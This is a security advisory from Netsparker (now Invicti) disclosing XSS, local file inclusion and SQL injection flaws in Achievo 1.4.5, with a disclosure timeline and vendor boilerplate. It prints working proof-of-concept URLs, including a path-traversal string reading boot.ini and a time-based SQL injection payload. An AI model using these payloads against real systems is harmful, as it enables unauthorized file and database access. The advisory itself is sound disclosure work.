Information
--------------------
Advisory by Netsparker (now Invicti)
Name:  XSS, LFI and SQL Injection Vulnerabilities in Achievo
Software:  Achievo 1.4.5 and possibly below.
Vendor Homepage:  http://www.achievo.org 
Vulnerability Type:  Cross-Site Scripting, Local File Inclusion and SQL Injection
Severity: Critical
Researcher: Canberk Bolat
Advisory Reference:  NS-12-016

Description
--------------------
Achievo is a flexible web-based resource management tool for business environments. Achievo's resource management capabilities will enable organizations to support their business processes in a simple, but effective manner.

Details
--------------------
Achievo is affected by XSS, LFI, and SQL Injection vulnerabilities in version 1.4.5.

  • XSS: http://example.com/dispatch.php (GET: atklevel, atkaction, atkstackid, atkselector, atkfilter, searchString)
  • LFI: http://example.com/dispatch.php?atkaction=search&atknodetype=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini%00.search&searchstring=3
  • SQL Injection: http://example.com/achievo-1.4.5/dispatch.php?atknodetype=employee.userprefs&atkaction=edit&atkselector=(SELECT%201%20FROM%20(SELECT%20SLEEP(25))A)&atklevel=-1&atkprevlevel=0&=3

You can read the full article about Cross-Site Scripting, LFI and SQL Injection vulnerabilities from here:

Advisory Timeline
--------------------
23/01/2011 - First contact
25/02/2012 - Second contact - No response
01/11/2012 - Advisory released

Credits
--------------------
It has been discovered on testing of Invicti Web Application Security Scanner.

References
--------------------

About Invicti
--------------------
Invicti Security is transforming the way web applications are secured. Invicti empowers organizations in every industry to scale their overall security operations, make the best use of their security resources, and engage developers in helping to improve their overall security posture.